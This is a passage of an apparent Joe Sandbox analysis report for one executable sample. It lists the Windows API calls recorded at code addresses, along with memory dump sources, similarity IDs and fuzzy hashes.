                                                                                                      • RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DFE6,?,?,00000008,00000000,00000000,0042E013), ref: 0042DF7C
                                                                                                      • RegCloseKey.ADVAPI32(?,0042DFED,?,00000000,00000000,00000000,00000000,00000000,0042DFE6,?,?,00000008,00000000,00000000,0042E013), ref: 0042DFE0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseEnum
                                                                                                      • String ID:
                                                                                                      • API String ID: 2818636725-0
                                                                                                      • Opcode ID: 18687f4e18b3232f9437fac6e5314fb2332009eed5616211d6a140e10b5cd508
                                                                                                      • Instruction ID: 2fe76ac110d60e281b9c8dcd8425dafac1d5c60e45ccd2ae84570cbaedcb928d
                                                                                                      • Opcode Fuzzy Hash: 18687f4e18b3232f9437fac6e5314fb2332009eed5616211d6a140e10b5cd508
                                                                                                      • Instruction Fuzzy Hash: 52319170F04258AEDB11DFA2DD82BAEB7B9EB48304F91407BE501E7281D6785A01CA2D
                                                                                                      APIs
                                                                                                      • CreateProcessA.KERNEL32(00000000,00000000,?,?,004580B4,00000000,0045809C,?,?,?,00000000,0045284E,?,?,?,00000001), ref: 00452828
                                                                                                      • GetLastError.KERNEL32(00000000,00000000,?,?,004580B4,00000000,0045809C,?,?,?,00000000,0045284E,?,?,?,00000001), ref: 00452830
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateErrorLastProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 2919029540-0
                                                                                                      • Opcode ID: 256024ef10b7bad05e9cca563efcf05eafb457725b2bcd1ab333216967b323f1
                                                                                                      • Instruction ID: 3ad6dec6d32dc5e6ab031f6e5884ad9a987dc2d9ff381773f4694f698bcb58b9
                                                                                                      • Opcode Fuzzy Hash: 256024ef10b7bad05e9cca563efcf05eafb457725b2bcd1ab333216967b323f1
                                                                                                      • Instruction Fuzzy Hash: D3117972600208AF8B00DEADDD41DABB7ECEB4E310B10456BFD08E3201D678AE148BA4
                                                                                                      APIs
                                                                                                      • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040AFF2
                                                                                                      • FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040B14F,00000000,0040B167,?,?,?,00000000), ref: 0040B003
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Resource$FindFree
                                                                                                      • String ID:
                                                                                                      • API String ID: 4097029671-0
                                                                                                      • Opcode ID: 020963cbed5d1efe29b5c6b0b84e3d8c20ff6c1b4cf1f3711bef16ed23147c41
                                                                                                      • Instruction ID: 22447e907da962d806d3eb032de74b702d5affa043e15eb070a4a3d902aeafed
                                                                                                      • Opcode Fuzzy Hash: 020963cbed5d1efe29b5c6b0b84e3d8c20ff6c1b4cf1f3711bef16ed23147c41
                                                                                                      • Instruction Fuzzy Hash: 0001DF71300604AFD710FF69DC92E1B77A9DB8A718711807AF500AB7D0DA79AC0096AD
                                                                                                      APIs
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0041EF03
                                                                                                      • 73A15940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042EEC0,?,00000001), ref: 0041EF09
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: A15940CurrentThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 1959240892-0
                                                                                                      • Opcode ID: 4f622a916fb84fb1e9f1f3e222a7611e51385d213cb7cd19795c9b5a33aefee2
                                                                                                      • Instruction ID: 3b2ca51acea6f31c20bceb620234c512699c69eae89bb1383ecfa3b3ac64bed2
                                                                                                      • Opcode Fuzzy Hash: 4f622a916fb84fb1e9f1f3e222a7611e51385d213cb7cd19795c9b5a33aefee2
                                                                                                      • Instruction Fuzzy Hash: FD013976A04604BFDB06CF6BDC1195ABBE9E789720B22887BEC04D36A0E6355810DE18
                                                                                                      APIs
                                                                                                      • MoveFileA.KERNEL32(00000000,00000000), ref: 00452CAE
                                                                                                      • GetLastError.KERNEL32(00000000,00000000,00000000,00452CD4), ref: 00452CB6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLastMove
                                                                                                      • String ID:
                                                                                                      • API String ID: 55378915-0
                                                                                                      • Opcode ID: 4a87794495b209091e638427933314290125c3fb15c22ae1653921e41cb98622
                                                                                                      • Instruction ID: 8cb4f6990e07c72a34a39c3d349ee9eec810a974928c7dd1f8c60ebce1e721cc
                                                                                                      • Opcode Fuzzy Hash: 4a87794495b209091e638427933314290125c3fb15c22ae1653921e41cb98622
                                                                                                      • Instruction Fuzzy Hash: D5014971B00204BB8B11DF799D414AEB7ECEB4A32531045BBFC08E3243EAB84E048558
                                                                                                      APIs
                                                                                                      • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,004527BB), ref: 00452795
                                                                                                      • GetLastError.KERNEL32(00000000,00000000,00000000,004527BB), ref: 0045279D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 1375471231-0
                                                                                                      • Opcode ID: 638905229d0ae290751701005a3127306b10a627987a4e9871fe20b3b513e6c4
                                                                                                      • Instruction ID: 7517b5081c7c6af98826394809c6fe2d976c468da5ddf52a6f68070703836f12
                                                                                                      • Opcode Fuzzy Hash: 638905229d0ae290751701005a3127306b10a627987a4e9871fe20b3b513e6c4
                                                                                                      • Instruction Fuzzy Hash: 40F0FC71A04704AFCF00DF759D4199EB7E8DB0E715B5049B7FC14E3242E7B94E1485A8
                                                                                                      APIs
                                                                                                      • LoadCursorA.USER32(00000000,00007F00), ref: 00423259
                                                                                                      • LoadCursorA.USER32(00000000,00000000), ref: 00423283
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CursorLoad
                                                                                                      • String ID:
                                                                                                      • API String ID: 3238433803-0
                                                                                                      • Opcode ID: 57390d314a1cb7161e6ddc30cf2ec12f57c29d9a020bc84e90da4252d8f033e1
                                                                                                      • Instruction ID: c8375b04fab070422f53c3d6524130e38f027298e82d6ab835706982cf041ecc
                                                                                                      • Opcode Fuzzy Hash: 57390d314a1cb7161e6ddc30cf2ec12f57c29d9a020bc84e90da4252d8f033e1
                                                                                                      • Instruction Fuzzy Hash: 0FF0A711704114AADA105D7E6CC0E2B7268DB91B36B6103BBFA3AD72D1C62E1D41457D
APIs
• SetErrorMode.KERNEL32(00008000), ref: 0042E3AE
• LoadLibraryA.KERNEL32(00000000,00000000,0042E3F8,?,00000000,0042E416,?,00008000), ref: 0042E3DD
Memory Dump Source
• Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
Similarity
• API ID: ErrorLibraryLoadMode
• String ID:
• API String ID: 2987862817-0
• Opcode ID: 7795cc8daa252176d65de3d8f3118caac988bfa791d53a68a28aad838e50b78c
• Instruction ID: 98bcbcc3e9aaf4c66058534b39987ccdd7eb12bd14468eaf88ad72af9e5505e3
• Opcode Fuzzy Hash: 7795cc8daa252176d65de3d8f3118caac988bfa791d53a68a28aad838e50b78c
• Instruction Fuzzy Hash: D5F05E70A14744BEDF119F779C6282ABAACE749B1179248B6F810A3691E67D48108928
APIs
• GetClassInfoA.USER32(00400000,?,?), ref: 004162F1
• GetClassInfoA.USER32(00000000,?,?), ref: 00416301
Memory Dump Source
• Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
Similarity
• API ID: ClassInfo
• String ID:
• API String ID: 3534257612-0
• Opcode ID: 0cefddb0d68ec1ee3d6e09aa9ac37d408dcb608ad702880eba3eeb66fdb88c2a
• Instruction ID: dc9e2acc6f173dd0cc3aa24d84b637cb0067f0ccc6b7cec6a0fcec59befe77f5
• Opcode Fuzzy Hash: 0cefddb0d68ec1ee3d6e09aa9ac37d408dcb608ad702880eba3eeb66fdb88c2a
• Instruction Fuzzy Hash: 22E012B26015155ADB10DB999D81EE326DCDB09310B110167BE14CA246D764DD005BA4
APIs
• SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,004703F1,?,00000000), ref: 004508FA
• GetLastError.KERNEL32(?,00000000,?,00000002,?,?,004703F1,?,00000000), ref: 00450902
  • Part of subcall function 004506A0: GetLastError.KERNEL32(004504BC,00450762,?,00000000,?,004977FC,00000001,00000000,00000002,00000000,0049795D,?,?,00000005,00000000,00497991), ref: 004506A3
Memory Dump Source
• Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
Similarity
• API ID: ErrorLast$FilePointer
• String ID:
• API String ID: 1156039329-0
• Opcode ID: 740b0e3b535324eeb3a184350110131e2b1ae31ce216053ff26069d2cbf9fe72
• Instruction ID: a22a311b57bf1dff13f45894218d9c0eaf9de3d8271a2984ee0ce7717fd7efee
• Opcode Fuzzy Hash: 740b0e3b535324eeb3a184350110131e2b1ae31ce216053ff26069d2cbf9fe72
• Instruction Fuzzy Hash: E0E012B53042059BFB00FA6599C1F3B63DCDB44315F00447AB984CF187D674CC155B29
APIs
• VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
• VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
Memory Dump Source
• Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
Similarity
• API ID: Virtual$AllocFree
• String ID:
• API String ID: 2087232378-0
• Opcode ID: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
• Instruction ID: 119661fe7174a079321c86e78af40791ac039b5eb8373b45468023a5ba433726
• Opcode Fuzzy Hash: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
• Instruction Fuzzy Hash: F7F08272A0063067EB60596A4C81B5359859BC5B94F154076FD09FF3E9D6B58C0142A9
APIs
• GetSystemDefaultLCID.KERNEL32(00000000,0040871A), ref: 00408603
  • Part of subcall function 00406DF4: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406E11
  • Part of subcall function 00408570: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
Memory Dump Source
• Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
Similarity
• API ID: DefaultInfoLoadLocaleStringSystem
• String ID:
• API String ID: 1658689577-0
• Opcode ID: 2ab4847006ef9acfce6ccb5f1f64a91e8b74d27154e4f0e7901e4566ca639e1f
• Instruction ID: ea6634d2ed8774f5e90a5a6f355d63bed973dafba18e0ec7d48b30ffe24ea089
• Opcode Fuzzy Hash: 2ab4847006ef9acfce6ccb5f1f64a91e8b74d27154e4f0e7901e4566ca639e1f
• Instruction Fuzzy Hash: C4314375E001199BCF01DF95C8819EEB7B9FF84314F15857BE815AB286E738AE018B98
APIs
• SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FC49
Memory Dump Source
• Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
Similarity
• API ID: InfoScroll
• String ID:
• API String ID: 629608716-0
• Opcode ID: cabb8c3e19a8a88e92d5d776e573f6eee413a8791bccb1521323fae2b782b601
• Instruction ID: 2c7078d87c5cd90d2d28a279248f0ceb63a34b6d02ec849610dd04de18f9c6e3
• Opcode Fuzzy Hash: cabb8c3e19a8a88e92d5d776e573f6eee413a8791bccb1521323fae2b782b601
• Instruction Fuzzy Hash: AA213EB1608745AFD350DF39D4407AABBE4BB48314F04893EA498C3741E778E99ACBD6
                                                                                                      APIs
                                                                                                        • Part of subcall function 0041EEB4: GetCurrentThreadId.KERNEL32 ref: 0041EF03
                                                                                                        • Part of subcall function 0041EEB4: 73A15940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042EEC0,?,00000001), ref: 0041EF09
                                                                                                      • SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,0046C756,?,00000000,?,?,0046C968,?,00000000,0046C9DC), ref: 0046C73A
                                                                                                        • Part of subcall function 0041EF68: IsWindow.USER32(?), ref: 0041EF76
                                                                                                        • Part of subcall function 0041EF68: EnableWindow.USER32(?,00000001), ref: 0041EF85
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$A15940CurrentEnablePathPrepareThreadWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 1039859321-0
                                                                                                      • Opcode ID: 7310e4a240e1736cfb30b9abd7a9c8d32e29debdd45fb2130da0edd2c14fc99c
                                                                                                      • Instruction ID: 552ca42e7a4f22222615ff1de8f8c20df724e6475abae56b3c63f202feb1ec23
                                                                                                      • Opcode Fuzzy Hash: 7310e4a240e1736cfb30b9abd7a9c8d32e29debdd45fb2130da0edd2c14fc99c
                                                                                                      • Instruction Fuzzy Hash: 28F0E270248300FFEB059BB2EDD6B2577E8E319716F91043BF504866D0EA795D40C96E
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 3934441357-0
                                                                                                      • Opcode ID: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                                                      • Instruction ID: d0e136ad155d69288fc423feb27b218c22c44688115b59a91c3ffefc647f2292
                                                                                                      • Opcode Fuzzy Hash: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                                                      • Instruction Fuzzy Hash: F0F0FF70509209DBBB1CCF54D0919AF7B71EB59310F20806FE907877A0D6346A80D759
                                                                                                      APIs
                                                                                                      • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 00416595
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 716092398-0
                                                                                                      • Opcode ID: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
                                                                                                      • Instruction ID: 39ad6e161323637dbb8254467e02d50acedd081d31d6b9d15e1adfc5f54150e8
                                                                                                      • Opcode Fuzzy Hash: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
                                                                                                      • Instruction Fuzzy Hash: 6EF02BB2200510AFDB84CF9CD9C0F9373ECEB0C210B0481A6FA08CF24AD220EC108BB0
                                                                                                      APIs
                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004149FF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CallbackDispatcherUser
                                                                                                      • String ID:
                                                                                                      • API String ID: 2492992576-0
                                                                                                      • Opcode ID: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                                                      • Instruction ID: 59ac3629b8f45f7a6bca1b57e2bf54285868c68ba6336e642f1ef9b7bb8d2b05
                                                                                                      • Opcode Fuzzy Hash: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                                                      • Instruction Fuzzy Hash: B2F0DA762042019FC740DF6CC8C488A77E5FF89255B5546A9F989CB356C731EC54CB91
                                                                                                      APIs
                                                                                                      • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004507F0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 823142352-0
                                                                                                      • Opcode ID: 838f498b19bb2aafec3be0ee987651bf511c4e6d2f63907cf4f88042037e4973
                                                                                                      • Instruction ID: 52eb814c7c241dc182afdc6c3e242d4e4c9a4e6d94000e289351c80ae23ff87c
                                                                                                      • Opcode Fuzzy Hash: 838f498b19bb2aafec3be0ee987651bf511c4e6d2f63907cf4f88042037e4973
                                                                                                      • Instruction Fuzzy Hash: 53E012B53541483EE780EEAD6C42F9777DC971A714F008037B998D7341D461DD158BA8
                                                                                                      APIs
